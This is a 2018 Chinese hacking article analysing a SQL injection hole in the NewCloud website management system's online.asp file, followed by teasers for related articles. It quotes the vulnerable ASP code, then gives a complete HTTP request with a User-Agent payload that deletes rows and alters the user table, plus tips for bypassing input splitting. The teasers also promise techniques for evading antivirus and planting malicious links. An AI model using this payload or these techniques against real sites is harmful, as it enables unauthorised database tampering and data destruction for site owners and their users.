新云网站管理系统注入漏洞代码分析黑客如何利用成功执行sql语句？

2018-03-18 16:23:08责编：llp 来源：驱动管家人气：

受影响系统：最新版本

漏洞文件：/inc/online.asp

代码分析如下：

OnlineSQL = "INSERT INTO NC_Online(id,ChannelID,username,identitys,station,ip,browser,startTime,lastTime,userid,strReferer) VALUES (" & UserSessionID & "," & cid & ",'" & strUsername & "','" & stridentitys & "','" & CurrentStation & "','" & remoteaddr & "','" & BrowserType.platform&"|"&BrowserType.Browser&BrowserType.version & "|"&BrowserType.AlexaToolbar&"'," & NowString & "," & NowString & "," & userid & ",'" & strReferer & "')" //第69行

。。。。。。

Agent = Request.ServerVariables("HTTP_USER_AGENT") //第99行

。。。。。。

ElseIf Left(Agent, 5) = "Opera" Then '有此标识为浏览器 //第162行

Agent = Split(Agent, "/")

Browser = "Mozilla "

Tmpstr = Split(Agent(1), " ")

version = Tmpstr(0)

HTTP_USER_AGENT我们可以控制，则version变量我们就可以控制了。

构造数据包如下：

POST /inc/online.asp HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*

Referer: http://localhost/xx.htm

Accept-Language: zh-cn

UA-CPU: x86

Accept-Encoding: gzip, deflate

User-Agent: Opera/haha',2008,2009,11111,'');deletefromNC_Online;update[NC_User]set[buycode]=7;--

Host: localhost

Connection: Keep-Alive

Cookie: ASPSESSIONIDAABBCRRS=FFGNDBDDKJLFADOGOMKLBGPF

成功执行sql语句

注意的地方：

1.在两次分割成数组的时候是以"/"和" ",所以构造的sql语句时使用的间隔符就不能用和空格，上面是使用tab键弄出来的空格。

2.一定要加上deletefromNC_Online,不然下次程序就不执行insert语句，而改成执行update语句了。

视频服务器有什么弱点？怎么入侵视频服务器？
视频服务器都会提供大量的视频资源，大部分都提供了在线观看以及下载服务。对于流量要求比较高，而从服务器本身的部署来看，也有一些特别之处。我们从一个入侵实例来看看视频服务器中暴露出的弱点。寻找漏洞我们
详情2018-01-25 17:08:38责编：llp 来源：驱动管家
如何利用sql注入漏洞入侵dvbbs php2.0获取权限？
几个月前，DVBBS php2 0暴了一个可以直接读出管理员密码的sql注入漏洞，当时这个漏洞出来的时候，我看的心痒，怎么还会有这么弱智的漏洞，DVBBS php2 0这套代码我还没仔细看过，于是5月中旬我down下来粗略看
详情2018-03-04 08:47:06责编：llp 来源：驱动管家
网站被挂马怎么查？查询服务器是否被上传webshell的方法
服务器被挂马或被黑的朋友应该知道，黑客入侵web服务器的第一目标是往服务器上上传一个webshell，有了webshell黑客就可以干更多的事情。网站被挂马后很多人会束手无策，无从查起，其实并不复杂，这里我将以php
详情2018-03-15 10:08:38责编：llp 来源：驱动管家
木马免杀有哪些绝招？木马免杀的五大绝招
常用的木马免杀方法绝招一：快速搞定瑞星文件查杀操作步骤：　第一步：用OD载入，来到程序的入口点。　第二步：把入口点的第一句PUSH　EBP　改成POP　EBP　然后保存就可以躲过瑞　星的表面查杀。绝招二：快速定位
详情2018-01-07 09:11:57责编：llp 来源：驱动管家
远程安全扫描器nessus有哪些优点？nessus扫描的步骤是什么？
漏洞扫描就是对计算机系统或者其它网络设备进行安全相关的检测，以找出安全隐患和可被黑客利用的漏洞。显然，漏洞扫描软件是把双刃剑，黑客利用它入侵系统，而系统管理员掌握它以后又可以有效的防范黑客入侵。因
详情2018-01-28 11:02:29责编：llp 来源：驱动管家
ms挂马方法 ms如何挂马？
SQL语句如下：用游标遍历所有表里如下数据类型的字段，然后UPDATE挂马。（全部是允许写入字符的字段）xtype=99 ntextxtype=35 text
详情2018-03-01 10:26:01责编：llp 来源：驱动管家
一些查询Linux系统的一句话脚本如何查看谁破解你的ssh？
1、查看谁破解你的sshcat var log auth log | grep "pam_unix(sshd:auth): authentication failure; " | cut -f14 -d | cut -d& 39;=& 39; -f2 | sort | uniq -c | sort -nr2、查看当前网
详情2018-03-01 12:15:36责编：llp 来源：驱动管家
绕过SQL注入限制的方法怎么绕过select这个关键字？
突然想我们是否可以用什么方法绕过SQL注入的限制呢？到网上考察了一下，提到的方法大多都是针对AND与“’”号和“=”号过滤的突破，虽然有点进步的地方，但还是有一些关键字没有绕过，由于我不常入侵网站所
详情2018-03-01 18:06:41责编：llp 来源：驱动管家
注射式攻击的原理如何绕过用户认证？
对于Web应用来说，注射式攻击由来已久，攻击方式也五花八门，常见的攻击方式有SQL注射、命令注射以及新近才出现的XPath注射等等。本文将以SQL注射为例，在源码级对其攻击原理进行深入的讲解。一、注射式攻击的原
详情2018-03-03 19:07:38责编：llp 来源：驱动管家
什么是dos攻击？dos攻击有哪些方法？
DoS攻击由于攻击简单、容易达到目的、难于防止和追查越来越成为常见的攻击方式。对它的总体了解，成为有效避免，查找原因，制订对策提供有用的帮助。DoS（Denial of Service）拒绝服务攻击广义上可以指任何导致
详情2018-02-01 12:17:26责编：llp 来源：驱动管家

新云网站管理系统注入漏洞代码分析 黑客如何利用成功执行sql语句？

新云网站管理系统注入漏洞代码分析黑客如何利用成功执行sql语句？